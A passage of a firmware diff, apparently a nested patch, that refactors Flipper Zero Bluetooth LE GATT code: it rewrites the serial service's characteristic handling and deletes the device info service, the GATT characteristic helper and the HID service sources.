+196,13 @@ void serial_svc_set_callbacks( + serial_svc->context = context; + serial_svc->buff_size = buff_size; + serial_svc->bytes_ready_to_receive = buff_size; +- + uint32_t buff_size_reversed = REVERSE_BYTES_U32(serial_svc->buff_size); +- flipper_gatt_characteristic_update( ++ aci_gatt_update_char_value( + serial_svc->svc_handle, +- &serial_svc->chars[SerialSvcGattCharacteristicFlowCtrl], +- &buff_size_reversed); ++ serial_svc->flow_ctrl_char_handle, ++ 0, ++ sizeof(uint32_t), ++ (uint8_t*)&buff_size_reversed); + } + + void serial_svc_notify_buffer_is_empty() { +@@ -195,12 +213,13 @@ void serial_svc_notify_buffer_is_empty() { + if(serial_svc->bytes_ready_to_receive == 0) { + FURI_LOG_D(TAG, "Buffer is empty. Notifying client"); + serial_svc->bytes_ready_to_receive = serial_svc->buff_size; +- + uint32_t buff_size_reversed = REVERSE_BYTES_U32(serial_svc->buff_size); +- flipper_gatt_characteristic_update( ++ aci_gatt_update_char_value( + serial_svc->svc_handle, +- &serial_svc->chars[SerialSvcGattCharacteristicFlowCtrl], +- &buff_size_reversed); ++ serial_svc->flow_ctrl_char_handle, ++ 0, ++ sizeof(uint32_t), ++ (uint8_t*)&buff_size_reversed); + } + furi_check(furi_mutex_release(serial_svc->buff_size_mtx) == FuriStatusOk); + } +@@ -208,8 +227,22 @@ void serial_svc_notify_buffer_is_empty() { + void serial_svc_stop() { + tBleStatus status; + if(serial_svc) { +- for(uint8_t i = 0; i < SerialSvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_delete(serial_svc->svc_handle, &serial_svc->chars[i]); ++ // Delete characteristics ++ status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->tx_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete TX characteristic: %d", status); ++ } ++ status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->rx_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete RX characteristic: %d", status); ++ } ++ status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->flow_ctrl_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Flow Control characteristic: %d", status); ++ } ++ status = aci_gatt_del_char(serial_svc->svc_handle, serial_svc->rpc_status_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete RPC Status characteristic: %d", status); + } + // Delete service + status = aci_gatt_del_service(serial_svc->svc_handle); +@@ -240,7 +273,7 @@ bool serial_svc_update_tx(uint8_t* data, uint16_t data_len) { + tBleStatus result = aci_gatt_update_char_value_ext( + 0, + serial_svc->svc_handle, +- serial_svc->chars[SerialSvcGattCharacteristicTx].handle, ++ serial_svc->tx_char_handle, + remained ? 0x00 : 0x02, + data_len, + value_offset, +diff --git a/firmware/targets/f7/ble_glue/services/serial_service.h b/firmware/targets/f7/ble_glue/serial_service.h +similarity index 100% +rename from firmware/targets/f7/ble_glue/services/serial_service.h +rename to firmware/targets/f7/ble_glue/serial_service.h +diff --git a/firmware/targets/f7/ble_glue/services/dev_info_service.c b/firmware/targets/f7/ble_glue/services/dev_info_service.c +deleted file mode 100644 +index 5bee97b41..000000000 +--- a/firmware/targets/f7/ble_glue/services/dev_info_service.c ++++ /dev/null +@@ -1,176 +0,0 @@ +-#include "dev_info_service.h" +-#include "app_common.h" +-#include "gatt_char.h" +-#include +- +-#include +-#include +-#include +- +-#include "dev_info_service_uuid.inc" +- +-#define TAG "BtDevInfoSvc" +- +-typedef enum { +- DevInfoSvcGattCharacteristicMfgName = 0, +- DevInfoSvcGattCharacteristicSerial, +- DevInfoSvcGattCharacteristicFirmwareRev, +- DevInfoSvcGattCharacteristicSoftwareRev, +- DevInfoSvcGattCharacteristicRpcVersion, +- DevInfoSvcGattCharacteristicCount, +-} DevInfoSvcGattCharacteristicId; +- +-#define DEVICE_INFO_HARDWARE_REV_SIZE 4 +-typedef struct { +- uint16_t service_handle; +- FlipperGattCharacteristicInstance characteristics[DevInfoSvcGattCharacteristicCount]; +- FuriString* version_string; +- char hardware_revision[DEVICE_INFO_HARDWARE_REV_SIZE]; +-} DevInfoSvc; +- +-static DevInfoSvc* dev_info_svc = NULL; +- +-static const char dev_info_man_name[] = "Flipper Devices Inc."; +-static const char dev_info_serial_num[] = "1.0"; +-static const char dev_info_rpc_version[] = TOSTRING(PROTOBUF_MAJOR_VERSION.PROTOBUF_MINOR_VERSION); +- +-static bool dev_info_char_firmware_rev_callback( +- const void* context, +- const uint8_t** data, +- uint16_t* data_len) { +- const DevInfoSvc* dev_info_svc = *(DevInfoSvc**)context; +- *data_len = sizeof(dev_info_svc->hardware_revision); +- if(data) { +- *data = (const uint8_t*)&dev_info_svc->hardware_revision; +- } +- return false; +-} +- +-static bool dev_info_char_software_rev_callback( +- const void* context, +- const uint8_t** data, +- uint16_t* data_len) { +- const DevInfoSvc* dev_info_svc = *(DevInfoSvc**)context; +- *data_len = furi_string_size(dev_info_svc->version_string); +- if(data) { +- *data = (const uint8_t*)furi_string_get_cstr(dev_info_svc->version_string); +- } +- return false; +-} +- +-static const FlipperGattCharacteristicParams dev_info_svc_chars[DevInfoSvcGattCharacteristicCount] = +- {[DevInfoSvcGattCharacteristicMfgName] = +- {.name = "Manufacturer Name", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = sizeof(dev_info_man_name) - 1, +- .data.fixed.ptr = (const uint8_t*)&dev_info_man_name, +- .uuid.Char_UUID_16 = MANUFACTURER_NAME_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [DevInfoSvcGattCharacteristicSerial] = +- {.name = "Serial Number", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = sizeof(dev_info_serial_num) - 1, +- .data.fixed.ptr = (const uint8_t*)&dev_info_serial_num, +- .uuid.Char_UUID_16 = SERIAL_NUMBER_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [DevInfoSvcGattCharacteristicFirmwareRev] = +- {.name = "Firmware Revision", +- .data_prop_type = FlipperGattCharacteristicDataCallback, +- .data.callback.context = &dev_info_svc, +- .data.callback.fn = dev_info_char_firmware_rev_callback, +- .uuid.Char_UUID_16 = FIRMWARE_REVISION_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [DevInfoSvcGattCharacteristicSoftwareRev] = +- {.name = "Software Revision", +- .data_prop_type = FlipperGattCharacteristicDataCallback, +- .data.callback.context = &dev_info_svc, +- .data.callback.fn = dev_info_char_software_rev_callback, +- .uuid.Char_UUID_16 = SOFTWARE_REVISION_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [DevInfoSvcGattCharacteristicRpcVersion] = { +- .name = "RPC Version", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = sizeof(dev_info_rpc_version) - 1, +- .data.fixed.ptr = (const uint8_t*)&dev_info_rpc_version, +- .uuid.Char_UUID_128 = DEV_INVO_RPC_VERSION_UID, +- .uuid_type = UUID_TYPE_128, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_AUTHEN_READ, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}}; +- +-void dev_info_svc_start() { +- dev_info_svc = malloc(sizeof(DevInfoSvc)); +- dev_info_svc->version_string = furi_string_alloc_printf( +- "%s %s %s %s", +- version_get_githash(NULL), +- version_get_version(NULL), +- version_get_gitbranchnum(NULL), +- version_get_builddate(NULL)); +- snprintf( +- dev_info_svc->hardware_revision, +- sizeof(dev_info_svc->hardware_revision), +- "%d", +- version_get_target(NULL)); +- tBleStatus status; +- +- // Add Device Information Service +- uint16_t uuid = DEVICE_INFORMATION_SERVICE_UUID; +- status = aci_gatt_add_service( +- UUID_TYPE_16, +- (Service_UUID_t*)&uuid, +- PRIMARY_SERVICE, +- 1 + 2 * DevInfoSvcGattCharacteristicCount, +- &dev_info_svc->service_handle); +- if(status) { +- FURI_LOG_E(TAG, "Failed to add Device Information Service: %d", status); +- } +- +- for(size_t i = 0; i < DevInfoSvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_init( +- dev_info_svc->service_handle, +- &dev_info_svc_chars[i], +- &dev_info_svc->characteristics[i]); +- flipper_gatt_characteristic_update( +- dev_info_svc->service_handle, &dev_info_svc->characteristics[i], NULL); +- } +-} +- +-void dev_info_svc_stop() { +- tBleStatus status; +- if(dev_info_svc) { +- furi_string_free(dev_info_svc->version_string); +- // Delete service characteristics +- for(size_t i = 0; i < DevInfoSvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_delete( +- dev_info_svc->service_handle, &dev_info_svc->characteristics[i]); +- } +- // Delete service +- status = aci_gatt_del_service(dev_info_svc->service_handle); +- if(status) { +- FURI_LOG_E(TAG, "Failed to delete device info service: %d", status); +- } +- free(dev_info_svc); +- dev_info_svc = NULL; +- } +-} +- +-bool dev_info_svc_is_started() { +- return dev_info_svc != NULL; +-} +diff --git a/firmware/targets/f7/ble_glue/services/dev_info_service_uuid.inc b/firmware/targets/f7/ble_glue/services/dev_info_service_uuid.inc +deleted file mode 100644 +index ad520f62e..000000000 +--- a/firmware/targets/f7/ble_glue/services/dev_info_service_uuid.inc ++++ /dev/null +@@ -1,3 +0,0 @@ +-#define DEV_INVO_RPC_VERSION_UID \ +- { 0x33, 0xa9, 0xb5, 0x3e, 0x87, 0x5d, 0x1a, 0x8e, 0xc8, 0x47, 0x5e, 0xae, 0x6d, 0x66, 0xf6, 0x03 } +- +diff --git a/firmware/targets/f7/ble_glue/services/gatt_char.c b/firmware/targets/f7/ble_glue/services/gatt_char.c +deleted file mode 100644 +index c06403f55..000000000 +--- a/firmware/targets/f7/ble_glue/services/gatt_char.c ++++ /dev/null +@@ -1,122 +0,0 @@ +-#include "gatt_char.h" +- +-#include +- +-#define TAG "GattChar" +- +-#define GATT_MIN_READ_KEY_SIZE (10) +- +-void flipper_gatt_characteristic_init( +- uint16_t svc_handle, +- const FlipperGattCharacteristicParams* char_descriptor, +- FlipperGattCharacteristicInstance* char_instance) { +- furi_assert(char_descriptor); +- furi_assert(char_instance); +- +- // Copy the descriptor to the instance, since it may point to stack memory +- char_instance->characteristic = malloc(sizeof(FlipperGattCharacteristicParams)); +- memcpy( +- (void*)char_instance->characteristic, +- char_descriptor, +- sizeof(FlipperGattCharacteristicParams)); +- +- uint16_t char_data_size = 0; +- if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataFixed) { +- char_data_size = char_descriptor->data.fixed.length; +- } else if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataCallback) { +- char_descriptor->data.callback.fn( +- char_descriptor->data.callback.context, NULL, &char_data_size); +- } +- +- tBleStatus status = aci_gatt_add_char( +- svc_handle, +- char_descriptor->uuid_type, +- &char_descriptor->uuid, +- char_data_size, +- char_descriptor->char_properties, +- char_descriptor->security_permissions, +- char_descriptor->gatt_evt_mask, +- GATT_MIN_READ_KEY_SIZE, +- char_descriptor->is_variable, +- &char_instance->handle); +- if(status) { +- FURI_LOG_E(TAG, "Failed to add %s char: %d", char_descriptor->name, status); +- } +- +- char_instance->descriptor_handle = 0; +- if((status == 0) && char_descriptor->descriptor_params) { +- uint8_t const* char_data = NULL; +- const FlipperGattCharacteristicDescriptorParams* char_data_descriptor = +- char_descriptor->descriptor_params; +- bool release_data = char_data_descriptor->data_callback.fn( +- char_data_descriptor->data_callback.context, &char_data, &char_data_size); +- +- status = aci_gatt_add_char_desc( +- svc_handle, +- char_instance->handle, +- char_data_descriptor->uuid_type, +- &char_data_descriptor->uuid, +- char_data_descriptor->max_length, +- char_data_size, +- char_data, +- char_data_descriptor->security_permissions, +- char_data_descriptor->access_permissions, +- char_data_descriptor->gatt_evt_mask, +- MIN_ENCRY_KEY_SIZE, +- char_data_descriptor->is_variable, +- &char_instance->descriptor_handle); +- if(status) { +- FURI_LOG_E(TAG, "Failed to add %s char descriptor: %d", char_descriptor->name, status); +- } +- if(release_data) { +- free((void*)char_data); +- } +- } +-} +- +-void flipper_gatt_characteristic_delete( +- uint16_t svc_handle, +- FlipperGattCharacteristicInstance* char_instance) { +- tBleStatus status = aci_gatt_del_char(svc_handle, char_instance->handle); +- if(status) { +- FURI_LOG_E( +- TAG, "Failed to delete %s char: %d", char_instance->characteristic->name, status); +- } +- free((void*)char_instance->characteristic); +-} +- +-bool flipper_gatt_characteristic_update( +- uint16_t svc_handle, +- FlipperGattCharacteristicInstance* char_instance, +- const void* source) { +- furi_assert(char_instance); +- const FlipperGattCharacteristicParams* char_descriptor = char_instance->characteristic; +- FURI_LOG_D(TAG, "Updating %s char", char_descriptor->name); +- +- const uint8_t* char_data = NULL; +- uint16_t char_data_size = 0; +- bool release_data = false; +- if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataFixed) { +- char_data = char_descriptor->data.fixed.ptr; +- if(source) { +- char_data = (uint8_t*)source; +- } +- char_data_size = char_descriptor->data.fixed.length; +- } else if(char_descriptor->data_prop_type == FlipperGattCharacteristicDataCallback) { +- const void* context = char_descriptor->data.callback.context; +- if(source) { +- context = source; +- } +- release_data = char_descriptor->data.callback.fn(context, &char_data, &char_data_size); +- } +- +- tBleStatus result = aci_gatt_update_char_value( +- svc_handle, char_instance->handle, 0, char_data_size, char_data); +- if(result) { +- FURI_LOG_E(TAG, "Failed updating %s characteristic: %d", char_descriptor->name, result); +- } +- if(release_data) { +- free((void*)char_data); +- } +- return result != BLE_STATUS_SUCCESS; +-} +\ No newline at end of file +diff --git a/firmware/targets/f7/ble_glue/services/gatt_char.h b/firmware/targets/f7/ble_glue/services/gatt_char.h +deleted file mode 100644 +index 959ab67a4..000000000 +--- a/firmware/targets/f7/ble_glue/services/gatt_char.h ++++ /dev/null +@@ -1,96 +0,0 @@ +-#pragma once +- +-#include +-#include +-#include +- +-#include +- +-#ifdef __cplusplus +-extern "C" { +-#endif +- +-// Callback signature for getting characteristic data +-// Is called when characteristic is created to get max data length. Data ptr is NULL in this case +-// The result is passed to aci_gatt_add_char as "Char_Value_Length" +-// For updates, called with a context - see flipper_gatt_characteristic_update +-// Returns true if *data ownership is transferred to the caller and will be freed +-typedef bool (*cbFlipperGattCharacteristicData)( +- const void* context, +- const uint8_t** data, +- uint16_t* data_len); +- +-typedef enum { +- FlipperGattCharacteristicDataFixed, +- FlipperGattCharacteristicDataCallback, +-} FlipperGattCharacteristicDataType; +- +-typedef struct { +- Char_Desc_Uuid_t uuid; +- struct { +- cbFlipperGattCharacteristicData fn; +- const void* context; +- } data_callback; +- uint8_t uuid_type; +- uint8_t max_length; +- uint8_t security_permissions; +- uint8_t access_permissions; +- uint8_t gatt_evt_mask; +- uint8_t is_variable; +-} FlipperGattCharacteristicDescriptorParams; +- +-typedef struct { +- const char* name; +- FlipperGattCharacteristicDescriptorParams* descriptor_params; +- union { +- struct { +- const uint8_t* ptr; +- uint16_t length; +- } fixed; +- struct { +- cbFlipperGattCharacteristicData fn; +- const void* context; +- } callback; +- } data; +- Char_UUID_t uuid; +- // Some packed bitfields to save space +- FlipperGattCharacteristicDataType data_prop_type : 2; +- uint8_t is_variable : 2; +- uint8_t uuid_type : 2; +- uint8_t char_properties; +- uint8_t security_permissions; +- uint8_t gatt_evt_mask; +-} FlipperGattCharacteristicParams; +- +-_Static_assert( +- sizeof(FlipperGattCharacteristicParams) == 36, +- "FlipperGattCharacteristicParams size must be 36 bytes"); +- +-typedef struct { +- const FlipperGattCharacteristicParams* characteristic; +- uint16_t handle; +- uint16_t descriptor_handle; +-} FlipperGattCharacteristicInstance; +- +-// Initialize a characteristic instance; copies the characteristic descriptor into the instance +-void flipper_gatt_characteristic_init( +- uint16_t svc_handle, +- const FlipperGattCharacteristicParams* char_descriptor, +- FlipperGattCharacteristicInstance* char_instance); +- +-// Delete a characteristic instance; frees the copied characteristic descriptor from the instance +-void flipper_gatt_characteristic_delete( +- uint16_t svc_handle, +- FlipperGattCharacteristicInstance* char_instance); +- +-// Update a characteristic instance; if source==NULL, uses the data from the characteristic +-// - For fixed data, fixed.ptr is used as the source if source==NULL +-// - For callback-based data, collback.context is passed as the context if source==NULL +-bool flipper_gatt_characteristic_update( +- uint16_t svc_handle, +- FlipperGattCharacteristicInstance* char_instance, +- const void* source); +- +-#ifdef __cplusplus +-} +-#endif +\ No newline at end of file +diff --git a/firmware/targets/f7/ble_glue/services/hid_service.c b/firmware/targets/f7/ble_glue/services/hid_service.c +deleted file mode 100644 +index d3fad0108..000000000 +--- a/firmware/targets/f7/ble_glue/services/hid_service.c ++++ /dev/null +@@ -1,366 +0,0 @@ +-#include "hid_service.h" +-#include "app_common.h" +-#include +-#include "gatt_char.h" +- +-#include +- +-#define TAG "BtHid" +- +-typedef enum { +- HidSvcGattCharacteristicProtocolMode = 0, +- HidSvcGattCharacteristicReportMap, +- HidSvcGattCharacteristicInfo, +- HidSvcGattCharacteristicCtrlPoint, +- HidSvcGattCharacteristicLed, +- HidSvcGattCharacteristicCount, +-} HidSvcGattCharacteristicId; +- +-typedef struct { +- uint8_t report_idx; +- uint8_t report_type; +-} HidSvcReportId; +- +-static_assert(sizeof(HidSvcReportId) == sizeof(uint16_t), "HidSvcReportId must be 2 bytes"); +- +-static const Service_UUID_t hid_svc_uuid = { +- .Service_UUID_16 = HUMAN_INTERFACE_DEVICE_SERVICE_UUID, +-}; +- +-static bool +- hid_svc_char_desc_data_callback(const void* context, const uint8_t** data, uint16_t* data_len) { +- const HidSvcReportId* report_id = context; +- *data_len = sizeof(HidSvcReportId); +- if(data) { +- *data = (const uint8_t*)report_id; +- } +- return false; +-} +- +-typedef struct { +- const void* data_ptr; +- uint16_t data_len; +-} HidSvcDataWrapper; +- +-static bool +- hid_svc_report_data_callback(const void* context, const uint8_t** data, uint16_t* data_len) { +- const HidSvcDataWrapper* report_data = context; +- if(data) { +- *data = report_data->data_ptr; +- *data_len = report_data->data_len; +- } else { +- *data_len = HID_SVC_REPORT_MAP_MAX_LEN; +- } +- return false; +-} +- +-// LED Descriptor params for BadBT +- +-static uint8_t led_desc_context_buf[2] = {HID_SVC_REPORT_COUNT + 1, 2}; +- +-static FlipperGattCharacteristicDescriptorParams hid_svc_char_descr_led = { +- .uuid_type = UUID_TYPE_16, +- .uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID, +- .max_length = HID_SVC_REPORT_REF_LEN, +- .data_callback.fn = hid_svc_char_desc_data_callback, +- .data_callback.context = led_desc_context_buf, +- .security_permissions = ATTR_PERMISSION_NONE, +- .access_permissions = ATTR_ACCESS_READ_WRITE, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT, +-}; +- +-static const FlipperGattCharacteristicParams hid_svc_chars[HidSvcGattCharacteristicCount] = { +- [HidSvcGattCharacteristicProtocolMode] = +- {.name = "Protocol Mode", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = 1, +- .uuid.Char_UUID_16 = PROTOCOL_MODE_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP, +- .security_permissions = ATTR_PERMISSION_NONE, +- .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [HidSvcGattCharacteristicReportMap] = +- {.name = "Report Map", +- .data_prop_type = FlipperGattCharacteristicDataCallback, +- .data.callback.fn = hid_svc_report_data_callback, +- .data.callback.context = NULL, +- .uuid.Char_UUID_16 = REPORT_MAP_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_NONE, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_VARIABLE}, +- [HidSvcGattCharacteristicInfo] = +- {.name = "HID Information", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = HID_SVC_INFO_LEN, +- .data.fixed.ptr = NULL, +- .uuid.Char_UUID_16 = HID_INFORMATION_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ, +- .security_permissions = ATTR_PERMISSION_NONE, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [HidSvcGattCharacteristicCtrlPoint] = +- {.name = "HID Control Point", +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = HID_SVC_CONTROL_POINT_LEN, +- .uuid.Char_UUID_16 = HID_CONTROL_POINT_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_WRITE_WITHOUT_RESP, +- .security_permissions = ATTR_PERMISSION_NONE, +- .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE, +- .is_variable = CHAR_VALUE_LEN_CONSTANT}, +- [HidSvcGattCharacteristicLed] = +- { +- .name = +- "HID LED State", // LED Characteristic and descriptor for BadBT to get numlock state for altchars +- .data_prop_type = FlipperGattCharacteristicDataFixed, +- .data.fixed.length = 1, +- .uuid.Char_UUID_16 = REPORT_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_WRITE_WITHOUT_RESP | CHAR_PROP_WRITE, +- .security_permissions = ATTR_PERMISSION_NONE, +- .gatt_evt_mask = GATT_NOTIFY_ATTRIBUTE_WRITE | +- GATT_NOTIFY_WRITE_REQ_AND_WAIT_FOR_APPL_RESP, +- .is_variable = CHAR_VALUE_LEN_CONSTANT, +- .descriptor_params = &hid_svc_char_descr_led, +- }, +-}; +- +-static const FlipperGattCharacteristicDescriptorParams hid_svc_char_descr_template = { +- .uuid_type = UUID_TYPE_16, +- .uuid.Char_UUID_16 = REPORT_REFERENCE_DESCRIPTOR_UUID, +- .max_length = HID_SVC_REPORT_REF_LEN, +- .data_callback.fn = hid_svc_char_desc_data_callback, +- .security_permissions = ATTR_PERMISSION_NONE, +- .access_permissions = ATTR_ACCESS_READ_WRITE, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_CONSTANT, +-}; +- +-static const FlipperGattCharacteristicParams hid_svc_report_template = { +- .name = "Report", +- .data_prop_type = FlipperGattCharacteristicDataCallback, +- .data.callback.fn = hid_svc_report_data_callback, +- .data.callback.context = NULL, +- .uuid.Char_UUID_16 = REPORT_CHAR_UUID, +- .uuid_type = UUID_TYPE_16, +- .char_properties = CHAR_PROP_READ | CHAR_PROP_NOTIFY, +- .security_permissions = ATTR_PERMISSION_NONE, +- .gatt_evt_mask = GATT_DONT_NOTIFY_EVENTS, +- .is_variable = CHAR_VALUE_LEN_VARIABLE, +-}; +- +-typedef struct { +- uint16_t svc_handle; +- FlipperGattCharacteristicInstance chars[HidSvcGattCharacteristicCount]; +- FlipperGattCharacteristicInstance input_report_chars[HID_SVC_INPUT_REPORT_COUNT]; +- FlipperGattCharacteristicInstance output_report_chars[HID_SVC_OUTPUT_REPORT_COUNT]; +- FlipperGattCharacteristicInstance feature_report_chars[HID_SVC_FEATURE_REPORT_COUNT]; +- // led state +- HidLedStateEventCallback led_state_event_callback; +- void* led_state_ctx; +-} HIDSvc; +- +-static HIDSvc* hid_svc = NULL; +- +-static SVCCTL_EvtAckStatus_t hid_svc_event_handler(void* event) { +- SVCCTL_EvtAckStatus_t ret = SVCCTL_EvtNotAck; +- hci_event_pckt* event_pckt = (hci_event_pckt*)(((hci_uart_pckt*)event)->data); +- evt_blecore_aci* blecore_evt = (evt_blecore_aci*)event_pckt->data; +- // aci_gatt_attribute_modified_event_rp0* attribute_modified; +- if(event_pckt->evt == HCI_VENDOR_SPECIFIC_DEBUG_EVT_CODE) { +- if(blecore_evt->ecode == ACI_GATT_ATTRIBUTE_MODIFIED_VSEVT_CODE) { +- // Process modification events +- ret = SVCCTL_EvtAckFlowEnable; +- } else if(blecore_evt->ecode == ACI_GATT_SERVER_CONFIRMATION_VSEVT_CODE) { +- // Process notification confirmation +- ret = SVCCTL_EvtAckFlowEnable; +- } else if(blecore_evt->ecode == ACI_GATT_WRITE_PERMIT_REQ_VSEVT_CODE) { +- // LED Characteristic and descriptor for BadBT to get numlock state for altchars +- // +- // Process write request +- aci_gatt_write_permit_req_event_rp0* req = +- (aci_gatt_write_permit_req_event_rp0*)blecore_evt->data; +- +- furi_check(hid_svc->led_state_event_callback && hid_svc->led_state_ctx); +- +- // this check is likely to be incorrect, it will actually work in our case +- // but we need to investigate gatt api to see what is the rules +- // that specify attibute handle value from char handle (or the reverse) +- if(req->Attribute_Handle == (hid_svc->chars[HidSvcGattCharacteristicLed].handle + 1)) { +- hid_svc->led_state_event_callback(req->Data[0], hid_svc->led_state_ctx); +- aci_gatt_write_resp( +- req->Connection_Handle, +- req->Attribute_Handle, +- 0x00, /* write_status = 0 (no error))*/ +- 0x00, /* err_code */ +- req->Data_Length, +- req->Data); +- aci_gatt_write_char_value( +- req->Connection_Handle, +- hid_svc->chars[HidSvcGattCharacteristicLed].handle, +- req->Data_Length, +- req->Data); +- ret = SVCCTL_EvtAckFlowEnable; +- } +- } +- } +- return ret; +-} +- +-void hid_svc_start() { +- tBleStatus status; +- hid_svc = malloc(sizeof(HIDSvc)); +- +- // Register event handler +- SVCCTL_RegisterSvcHandler(hid_svc_event_handler); +- /** +- * Add Human Interface Device Service +- */ +- status = aci_gatt_add_service( +- UUID_TYPE_16, +- &hid_svc_uuid, +- PRIMARY_SERVICE, +- 2 + /* protocol mode */ +- (4 * HID_SVC_INPUT_REPORT_COUNT) + (3 * HID_SVC_OUTPUT_REPORT_COUNT) + +- (3 * HID_SVC_FEATURE_REPORT_COUNT) + 1 + 2 + 2 + 2 + +- 4, /* Service + Report Map + HID Information + HID Control Point + LED state */ +- &hid_svc->svc_handle); +- if(status) { +- FURI_LOG_E(TAG, "Failed to add HID service: %d", status); +- } +- +- for(size_t i = 0; i < HidSvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_init( +- hid_svc->svc_handle, &hid_svc_chars[i], &hid_svc->chars[i]); +- } +- uint8_t protocol_mode = 1; +- flipper_gatt_characteristic_update( +- hid_svc->svc_handle, +- &hid_svc->chars[HidSvcGattCharacteristicProtocolMode], +- &protocol_mode); +- +- // reports +- FlipperGattCharacteristicDescriptorParams hid_svc_char_descr; +- FlipperGattCharacteristicParams report_char; +- HidSvcReportId report_id; +- +- memcpy(&hid_svc_char_descr, &hid_svc_char_descr_template, sizeof(hid_svc_char_descr)); +- memcpy(&report_char, &hid_svc_report_template, sizeof(report_char)); +- +- hid_svc_char_descr.data_callback.context = &report_id; +- report_char.descriptor_params = &hid_svc_char_descr; +- +- typedef struct { +- uint8_t report_type; +- uint8_t report_count; +- FlipperGattCharacteristicInstance* chars; +- } HidSvcReportCharProps; +- +- HidSvcReportCharProps hid_report_chars[] = { +- {0x01, HID_SVC_INPUT_REPORT_COUNT, hid_svc->input_report_chars}, +- {0x02, HID_SVC_OUTPUT_REPORT_COUNT, hid_svc->output_report_chars}, +- {0x03, HID_SVC_FEATURE_REPORT_COUNT, hid_svc->feature_report_chars}, +- }; +- +- for(size_t report_type_idx = 0; report_type_idx < COUNT_OF(hid_report_chars); +- report_type_idx++) { +- report_id.report_type = hid_report_chars[report_type_idx].report_type; +- for(size_t report_idx = 0; report_idx < hid_report_chars[report_type_idx].report_count; +- report_idx++) { +- report_id.report_idx = report_idx + 1; +- flipper_gatt_characteristic_init( +- hid_svc->svc_handle, +- &report_char, +- &hid_report_chars[report_type_idx].chars[report_idx]); +- } +- } +-} +- +-bool hid_svc_update_report_map(const uint8_t* data, uint16_t len) { +- furi_assert(data); +- furi_assert(hid_svc); +- +- HidSvcDataWrapper report_data = { +- .data_ptr = data, +- .data_len = len, +- }; +- return flipper_gatt_characteristic_update( +- hid_svc->svc_handle, &hid_svc->chars[HidSvcGattCharacteristicReportMap], &report_data); +-} +- +-bool hid_svc_update_input_report(uint8_t input_report_num, uint8_t* data, uint16_t len) { +- furi_assert(data); +- furi_assert(hid_svc); +- furi_assert(input_report_num < HID_SVC_INPUT_REPORT_COUNT); +- +- HidSvcDataWrapper report_data = { +- .data_ptr = data, +- .data_len = len, +- }; +- return flipper_gatt_characteristic_update( +- hid_svc->svc_handle, &hid_svc->input_report_chars[input_report_num], &report_data); +-} +- +-bool hid_svc_update_info(uint8_t* data) { +- furi_assert(data); +- furi_assert(hid_svc); +- +- return flipper_gatt_characteristic_update( +- hid_svc->svc_handle, &hid_svc->chars[HidSvcGattCharacteristicInfo], &data); +-} +- +-void hid_svc_register_led_state_callback(HidLedStateEventCallback callback, void* context) { +- furi_assert(hid_svc); +- furi_assert(callback); +- furi_assert(context); +- +- hid_svc->led_state_event_callback = 